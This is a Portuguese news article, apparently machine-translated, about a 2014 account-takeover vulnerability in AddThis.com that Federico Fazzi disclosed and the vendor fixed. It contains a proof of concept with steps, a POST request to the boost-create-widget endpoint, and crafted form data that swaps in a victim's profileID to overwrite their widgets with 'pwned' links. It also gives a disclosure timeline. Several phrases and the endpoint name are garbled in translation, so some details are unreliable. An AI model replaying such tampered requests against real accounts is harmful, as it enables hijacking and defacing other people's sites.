Vulnerabilidade no Addthis permite que hacker assuma o controle da conta

O especialista em segurança Federico Fazzi revelou uma vulnerabilidade grave no serviço Addthis.com que permite que atacantes para assumir o controle de qualquer conta.

O especialista em segurança italiano Federico Fazzi  descobriu uma vulnerabilidade grave no serviço Addthis.com que permite que atacantes para assumir o controle de qualquer conta Addthis. AddThis é a maior plataforma de compartilhamento de conteúdo e percepções sociais do mundo, prvides um conjunto de plugins site gratuito para adicionar como, compartilhar e seguir botões para qualquer site.

Federico foi adicioná-lo ao seu wensite quando decidem realizar alguns testes para verificar se o uso do plugin popular é seguro. A pesquisadora analisou algumas solicitações HTTP, sua atenção estava voltada principalmente para a manipulação do parâmetro profileID que é visível no código-fonte (por exemplo, ra-XXXXXXXXXXXXXXXX). Federico percebeu que era possível usar qualquer profileID e atc como a conta de associado.

Prova de Conceito:

User_X = ra-5438e922313abc3a atacante User_Y = ra-538ce0c960e04da4 vítima

ra-XXXXXXXXXXXXXXXX referência a ProfileId Usuário

User_X visita o site do User_Y que usar Addthis plug-in
User_X inspecionar o código fonte da página e procurar corda profileID ra-538ce0c960e04da4 do User_Y
Logins User_X em seu relato Addthis.com (ra-5438e922313abc3a foi designado a User_X)
User_X faz uma solicitação POST para:
https://www.addthis.com/meta-data/boost-criar-widget endpoint com um cabeçalho trabalhada
(Viva cabeçalhos HTTP) usando o método de impulso-criar-widget
Antes User_X faz uma solicitação POST, A propriedade pub precisa ser alterado para o valor da propriedade site vulnerável (por ex. (User_X) ra-5438e922313abc3a => (User_Y) ra-538ce0c960e04da4)
Exemplo POST Request Header

Endereço remoto: 208.49.103.220: 443
Request URL: https: //www.addthis.com/meta-data/boost criar--widget
Request Method: POST
Código Status: 200 OK
Pedido Headersview parsed
POST  /meta-data/boost-create-widget  HTTP / 1.1
Host :  www.addthis.com
Connection :  keep-alive
Content-Length :  1070
Pragma :  no-cache
Cache-Control :  no-cache
Accept :  */*
[..]
Trabalhada POST dados de formulário
pub: ra-538ce0c960e04da4 // (User_X) ra-5438e922313abc3a => (User_Y) ra-538ce0c960e04da4
template:_default
widget[enabled]:true
widget[title]:Follow
widget[size]:large
widget[orientation]:vertical
widget[elements]:.addthis_vertical_follow_toolbox
widget[id]:flwv  widget[services][0][id]:pwned  widget[services][0][service]:facebook
widget[services][0][svc]:facebook
widget[services][0][name]:Facebook
widget[services][0][url]:http://www.facebook.com/pwned
widget[services][1][id]:pwned  widget[services][1][service]:twitter
widget[services][1][svc]:twitter
widget[services][1][name]:Twitter
widget[services][1][url]:http://twitter.com/intent/follow?source=followbutton&variant=1.0&screen_name=pwned
widget[services][2][id]:pwned  widget[services][2][service]:linkedin  widget[services][2][svc]:linkedin  widget[services][2][name]:LinkedIn
widget[services][2][url]:http://www.linkedin.com/in/pwned
Agora User_X recebe uma resposta 201 .
Enquanto em, os dados site do plugin User_Y ficar atualizado com o valor da propriedade Pwned apresentado pelo User_X.

AddThis 2

Note-se que, um usuário mal-intencionado pode realizar qualquer pedido através pub usuário valor do imóvel vulnerável. Além disso, o site Addthis.com é destituído, em grande parte dos controles CSRF , por esta razão não há nenhuma prova de conceito, é muito clara ..

Cenário de vídeo Exemplo usando Addthis "/ boost-criar-widget" método

Cronograma de divulgação:
2014/10/10 - Bug reportado ao Suporte Addthis
13/10/2014 - Suporte Addthis deu uma resposta
14/10/2014 - Resposta de Addthis que informa o pesquisador que o bug foi corrigido
14/10/2014 - A divulgação pública
Federico Fazzi (aka Eurialo)
Linux, Segurança e Bitcoin entusiasta, hacktivist e pesquisador de segurança.

( Assuntos de Segurança  - AddThis, hacking)